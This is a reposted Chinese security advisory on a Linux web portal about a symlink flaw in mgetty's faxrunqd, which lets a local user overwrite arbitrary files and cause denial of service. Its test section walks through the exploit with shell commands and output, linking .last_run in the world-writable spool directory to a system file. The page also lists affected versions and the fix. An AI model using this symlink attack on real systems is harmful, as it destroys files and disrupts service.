IT猫扑网：您身边最放心的安全下载站！ 最新更新| 软件分类| 专题汇总| 手机版

首页常用软件软件下载安卓下载苹果下载MAC下载文章教程专题汇总排行榜

游戏攻略人工智能游戏资讯应用教程物联网虚拟现实在线协作服务器网络编程数据库路由交换网络安全系统集成IT认证考试操作系统攻略教程

ssd测试软件autocad虚拟打印机宋体字体视频转换器我的世界JAVA版

您当前所在位置：IT猫扑网 > 系统集成 > 网络故障 > Linux faxrunqd文件创建问题导致拒绝服务攻击

Linux faxrunqd文件创建问题导致拒绝服务攻击

时间：2015-06-28 00:00 来源：IT猫扑网|http://www.itmop.com/ 作者：网管联盟 我要评论(0)

　　受影响系统：

　　mgetty 1.1.21以及更低版本

　　- Linux redhat 6.2以及更低版本

　　- Linux-Mandrake 7.1 以及更低版本

　　- 其他使用有问题mgetty的unix系统

　　不受影响系统：

　　mgetty 1.1.22

　　描述：

　　mgetty中带了一个faxrunqd程序,它用来发送faxspool(1)产生的传真队列中的任务。

　　在执行时，该程序会在/var/spool/outgoing/目录下创建一个.last_run文件，这个目录是任何人可写的。在某些mgetty版本中所带的faxrunqd没有检查该文件是否存在或是链接文件，因此攻击者可能覆盖任意系统文件，造成拒绝服务攻击。

　　<* 来源: Stan Bubrouski (satan@fastdial.net)*>

　　测试方法：

　　警 告

　　以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负!

　　[user@king /tmp]$ id

　　uid=200(user) gid=100(users) groups=100(users)

　　[user@king /tmp]$ ls -al /var/spool/fax/outgoing

　　total 3

　　drwxrwxrwt 3 root root 1024 Jun 2 18:46 .

　　drwxr-xr-x 4 root root 1024 Jun 2 18:46 ..

　　drwxrwxrwx 2 root root 1024 Jun 1 00:47 locks

　　[user@king /tmp]$ ls -al /etc/smash_me

　　-rw-r--r-- 1 root root 12 Jun 2 18:45 /etc/smash_me

　　[user@king /tmp]$ cat /etc/smash_me

　　Smash me!!!

　　[user@king /tmp]$ ln -s /etc/smash_me /var/spool/fax/outgoing/.last_run

　　[user@king /tmp]$ ls -al /var/spool/fax/outgoing

　　total 3

　　drwxrwxrwt 3 root root 1024 Jun 2 18:48 .

　　drwxr-xr-x 4 root root 1024 Jun 2 18:46 ..

　　lrwxrwxrwx 1 user users 13 Jun 2 18:48 .last_run ->

　　/etc/smash_me

　　drwxrwxrwx 2 root root 1024 Jun 1 00:47 locks

　　Root console:

　　[root@king /tmp]# faxrunqd -l ttyS0

　　...

　　Remote unprivilaged user:

　　[user@king /tmp]$ ls -al /var/spool/fax/outgoing

　　total 3

　　drwxrwxrwt 3 root root 1024 Jun 2 18:48 .

　　drwxr-xr-x 4 root root 1024 Jun 2 18:48 ..

　　lrwxrwxrwx 1 user users 13 Jun 2 18:48 .last_run ->

　　/etc/smash_me

　　drwxrwxrwx 2 root root 1024 Jun 1 00:47 locks

　　[user@king /tmp]$ ls -al /etc/smash_me

　　-rw-r--r-- 1 root root 44 Jun 2 18:48 /etc/smash_me

　　[user@king /tmp]$ cat /etc/smash_me

　　Fri Jun 2 18:48:47 2000 /usr/sbin/faxrunqd

　　建议：

　　mgetty 1.1.22已经解决了这个问题，您可以在下列地址下载:http://alpha.greenie.net/mgetty/

关键词标签：拒绝服务攻击,Linux,f

相关阅读 提示dns服务错误怎么办 dns错误问题多种解决方法 “无法浏览网页” 十招解决疑难杂症 路由器无线不能上网等故障排除 解决VPN路由设置不能访问外网的问题 以前单位同事一次DHCP snooping排错经历 路由器未接地引起的无法拨号故障解决

文章评论

查看所有0条评论>>

发表评论

提交评论

热门文章 提示dns服务错误怎么办 dns错误问题多种解决方法 三小招教你修复无线网络断线的问题 从协议出发 排除企业网络中稀奇故障 电信WLAN故障诊断案例 光纤头端接接续故障的主要因素 上网故障 别总拿ARP欺骗病毒说事

相关下载

人气排行 解决VPN路由设置不能访问外网的问题 登录SSH服务器失败问题的分析及解决 光纤上网 路由器设置页面进不去怎么办 核心交换机故障现象及解决办法 无线网卡连接不上怎么办_无线网卡连接不上解决方法 路由设置不当 导致VPN无法访问外网 提示dns服务错误怎么办 dns错误问题多种解决方法 彻底避免环路问题 正确配置交换机步骤 本机IP设置不当造成路由异常故障分析 经验分享：网关配置不当导致外网不通 解惑：双网络接口下的间歇性断网故障 无线宽带错误代码大全